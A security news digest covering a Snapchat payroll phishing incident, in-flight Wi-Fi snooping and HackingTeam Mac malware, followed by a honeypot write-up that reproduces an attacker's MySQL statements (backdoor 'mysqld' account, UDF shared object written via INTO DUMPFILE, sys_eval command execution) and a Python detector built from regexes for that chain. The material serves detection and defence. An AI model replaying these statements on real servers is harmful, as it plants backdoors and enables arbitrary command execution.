Information Security News
by Sean Gallagher
In a blog post on Sunday, Snapchat executives revealed that the payroll data of some current and former employees was exposed as the result of a scam e-mail sent to a human resources employee at the company.
"The good news is that our servers were not breached, and our users’ data was totally unaffected by this," a company spokesperson said in the post. "The bad news is that a number of our employees have now had their identity compromised. And for that, we’re just impossibly sorry."
On February 26, an employee in Snapchat's payroll department received a "spear phishing" e-mail that appeared to be from Snapchat CEO Evan Spiegel—but that came from an external e-mail address. The message requested employee payroll information. The individual targeted didn't recognize the message as a scam, and they forwarded the requested information.
by Sean Gallagher
There's a certain degree of doubt about whether it's possible to hack into an airplane's avionics from the in-flight Wi-Fi, as one security researcher claimed last year. But it's possible to do all sorts of things to fellow passengers—as USA Today columnist Steven Petrow recently found out. Following an American Airlines flight, Petrow was approached by a man who claimed to have gained access to the content of his e-mails, which showed communication with sources for a story Petrow was writing.
Petrow offered a bunch of advice on how to protect privacy on mobile devices (strong passwords, password managers, and encrypted communications apps). But none of these really addresses how he got "hacked"—the in-flight Wi-Fi provided a perfect environment for an attacker to undermine the security of other passengers' communications. It's something that could easily be fixed, but in-flight Internet providers are in no hurry to do so, because it's not in their interest.
When you're on any public Wi-Fi, you're bound to give up some personal information to anyone who might be watching the traffic (whether that be the company providing the service, for marketing purposes, or someone with more malicious intent). For example, in previous tests (such as the ones we conducted with NPR), we saw iPads and iPhones that identified themselves to the network by their owner's name, and Web requests to websites and mobile app traffic (some including personal data) were also visible. And as might have happened to Petrow, old-school POP/SMTP e-mail messages could be practically read off the wire.
Researchers have uncovered what appears to be newly developed Mac malware from HackingTeam, a discovery that's prompting speculation that the disgraced malware-as-a-service provider has reemerged since last July's hack that spilled gigabytes worth of the group's private e-mail and source code.
The sample was uploaded on February 4 to the Google-owned VirusTotal scanning service, which at the time showed it wasn't detected by any of the major antivirus programs. (Ahead of this report on Monday, it was detected by 10 of 56 AV services.) A technical analysis published Monday morning by SentinelOne security researcher Pedro Vilaça showed that the installer was last updated in October or November, and an embedded encryption key is dated October 16, three months after the HackingTeam compromise.
The sample installs a copy of HackingTeam's signature Remote Code Systems compromise platform, leading Vilaça to conclude that the outfit's comeback mostly relies on old, largely unexceptional source code, despite the group vowing in July that it would return with new code.
We had a mysql honeypot getting hit hard with this "exploit" recently. I am enclosing the word exploit in quotes as the MySQL server was configured to allow logging in without a password.
Here are some of the highlights of what happened after the attacker logged in.
First, the attacker makes sure that the root user has all possible privileges:
GRANT ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DROP, EVENT, EXECUTE, FILE, INDEX, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER ON *.* TO 'root'@'%';
FLUSH PRIVILEGES;
Next, a backdoor account, mysqld, is added. Interestingly, this is done twice: first by inserting the user directly into the mysql.user table, then again with CREATE USER and GRANT statements.
insert into mysql.user(Host,User,Password) values('%','mysqld',password('654321*a'));
CREATE USER 'mysqld'@'%' IDENTIFIED BY '654321*a';
GRANT ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DROP, EVENT, EXECUTE, FILE, INDEX, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER ON *.* TO 'mysqld'@'%';
Next, the attacker degrades the security of our MySQL install further by allowing stored functions to write data to binary logs:
set global log_bin_trust_function_creators=1
Of course, we may already be infected, so the attacker first cleans up prior copies of the malicious code:
DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
DROP FUNCTION IF EXISTS sys_get;
DROP FUNCTION IF EXISTS sys_set;
DROP FUNCTION IF EXISTS sys_exec;
Then, a set of files is written to /usr/lib/mysql/plugin. This directory *should* not be writable by the mysql user, so this step should fail in most installs.
select unhex('7F454C4602010100...000000') into dumpfile '/usr/lib/mysql/plugin/XXSIlX.so';
In case MySQL is properly configured, the same file is also written to /usr/lib/mysql and other locations. Then, the .so file (an ELF binary) is used to create a function.
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'XXSIlX.so';
It turns out that this function is essentially an exec that allows executing arbitrary system commands. The attacker will now use it to download additional code (I got errors trying to download the code now). Note that the code is downloaded from web servers that listen on various high ports, not port 80.
Probably the best indicator of compromise is the existence of the mysqld user. This user appears to be common to all the attempts I have seen recently; the file names for the .so files change. Auditing the functions that exist on your MySQL server (the mysql.func table) will also help. And PLEASE: do not expose port 3306 on the Internet, and set a strong password or use certificates to authenticate.
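As an added example, not part of the diary and not ISC's code: the stages of the chain above (the mysqld account, log_bin_trust_function_creators, the DROP FUNCTION cleanup, INTO DUMPFILE, CREATE FUNCTION ... SONAME) turned into a detector that runs over MySQL general query log lines. The log lines, thread ids, and the truncated hex body are constructed; the MySQL 5.7 general-log layout (timestamp, thread id, command, argument) is assumed.

```python
import re

# Constructed sample of a MySQL general query log. Thread 42 replays the
# attack chain from the diary (hex body truncated); thread 43 is benign traffic.
SAMPLE_GENERAL_LOG = """\
2016-02-29T08:15:02.202020Z\t   42 Query\tGRANT ALTER, SUPER, FILE ON *.* TO 'root'@'%'
2016-02-29T08:15:02.303030Z\t   42 Query\tinsert into mysql.user(Host,User,Password) values('%','mysqld',password('654321*a'))
2016-02-29T08:15:02.404040Z\t   42 Query\tCREATE USER 'mysqld'@'%' IDENTIFIED BY '654321*a'
2016-02-29T08:15:02.505050Z\t   42 Query\tset global log_bin_trust_function_creators=1
2016-02-29T08:15:02.606060Z\t   42 Query\tDROP FUNCTION IF EXISTS sys_exec
2016-02-29T08:15:02.707070Z\t   42 Query\tselect unhex('7F454C46...') into dumpfile '/usr/lib/mysql/plugin/XXSIlX.so'
2016-02-29T08:15:02.808080Z\t   42 Query\tCREATE FUNCTION sys_eval RETURNS string SONAME 'XXSIlX.so'
2016-02-29T08:15:03.909090Z\t   43 Query\tSELECT id, name FROM customers WHERE id = 7
"""

# One regex per stage of the chain; case-insensitive because MySQL keywords are.
INDICATORS = [
    ("backdoor account 'mysqld' created or granted",
     re.compile(r"\b(?:CREATE\s+USER|GRANT\b.*?\bTO|INSERT\s+INTO\s+mysql\.user\b.*?\bVALUES)\b[^;]*?\bmysqld\b", re.I)),
    ("log_bin_trust_function_creators switched on",
     re.compile(r"\bSET\s+GLOBAL\s+log_bin_trust_function_creators\s*=\s*1\b", re.I)),
    ("lib_mysqludf_sys UDFs dropped before re-install",
     re.compile(r"\bDROP\s+FUNCTION\b.*\b(?:sys_(?:exec|eval|get|set)|lib_mysqludf_sys_info)\b", re.I)),
    ("shared object written with INTO DUMPFILE",
     re.compile(r"\bINTO\s+DUMPFILE\s+'[^']*\.so'", re.I)),
    ("UDF loaded from shared object via SONAME",
     re.compile(r"\bCREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\b", re.I)),
]

# timestamp, thread id, command, argument
LOG_LINE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$")

def scan_general_log(lines):
    """Return (thread_id, indicator, statement) for each Query line that matches."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m.group(3) != "Query":
            continue
        thread_id, statement = m.group(2), m.group(4)
        for label, pattern in INDICATORS:
            if pattern.search(statement):
                findings.append((thread_id, label, statement))
    return findings

def chain_complete(findings):
    """True when one connection both planted the mysqld account and loaded a UDF."""
    by_thread = {}
    for thread_id, label, _ in findings:
        by_thread.setdefault(thread_id, set()).add(label)
    return any({INDICATORS[0][0], INDICATORS[4][0]} <= labels for labels in by_thread.values())
```

The general log must be enabled (general_log=ON) for this to have anything to read; on a busy server, run it against the binary log via mysqlbinlog output instead, since that already records the DDL and GRANT statements.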